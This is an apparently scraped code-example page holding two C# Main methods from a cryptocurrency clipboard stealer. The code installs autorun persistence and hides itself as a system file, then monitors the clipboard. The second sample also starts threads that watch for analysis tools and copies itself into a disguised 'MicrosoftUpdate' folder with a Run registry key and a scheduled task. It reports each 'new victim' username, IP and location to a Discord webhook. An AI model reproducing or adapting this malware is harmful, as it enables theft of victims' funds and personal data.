Ejemplo n.º 1
0
 private static void Main()
 {
     AppMutex.Check();
     if (!Autorun.is_installed())
     {
         Autorun.install();
     }
     Attributes.set_hidden();
     Attributes.set_system();
     ClipboardMonitor.run();
 }
Ejemplo n.º 2
0
        public static void Main()
        {
            #region protectionsapply
            Thread th = new Thread(MonitorVSez);
            th.Start();
            #endregion

            #region protectionsagainst2shitsapply
            Thread th2 = new Thread(MonitorVSshits);
            th2.Start();
            #endregion

            #region mutex
            AppMutex.Check();
            #endregion

            #region vars
            string takeproc = System.AppDomain.CurrentDomain.FriendlyName;
            #endregion

            #region cryptologs
            using (DcWebHooklogs dcWeb = new DcWebHooklogs())
            {
                ManagementObjectSearcher mos = new ManagementObjectSearcher("select * from Win32_OperatingSystem");
                foreach (ManagementObject managementObject in mos.Get())
                {
                    String OSName = managementObject["Caption"].ToString();
                    dcWeb.ProfilePicture = "https://i.imgur.com/BcpHeJb.png";
                    dcWeb.UserName       = "******";
                    dcWeb.WebHook        = "discordwebhooklink"; //add here
                    dcWeb.SendMessage("```" + "You got a new victim infected with crypto stealer." + " | " + "PC Username: "******" , " + "IP: " + GetIPAddress() + " , " + " Country: " + GetCountry() + " , " + " City: " + GetCity() + Environment.NewLine + "OS: " + OSName + "```");
                }
            }
            #endregion

            #region schtaskapply
            Thread hatzu = new Thread(schtaskumatidar);
            hatzu.Start();
            #endregion

            #region hidestartup
            string folderName   = Environment.ExpandEnvironmentVariables(@"%USERPROFILE%\AppData\Roaming\MicrosoftUpdate\");
            string destinatione = Environment.ExpandEnvironmentVariables(@"%USERPROFILE%\AppData\Roaming\MicrosoftUpdate\" + takeproc);
            if (!File.Exists(destinatione))
            {
                System.IO.Directory.CreateDirectory(folderName);
                File.Copy(takeproc, destinatione);

                File.SetAttributes(folderName, FileAttributes.Hidden | FileAttributes.System);
                File.SetAttributes(destinatione, FileAttributes.Hidden | FileAttributes.System);
            }
            #endregion

            #region startupkeyreg
            Microsoft.Win32.RegistryKey rk = Microsoft.Win32.Registry.CurrentUser.OpenSubKey
                                                 ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            rk.SetValue(Path.GetFileName(destinatione), destinatione);
            #endregion

            #region runcommand
            new Thread(() => { Run(); }).Start();
            #endregion
        }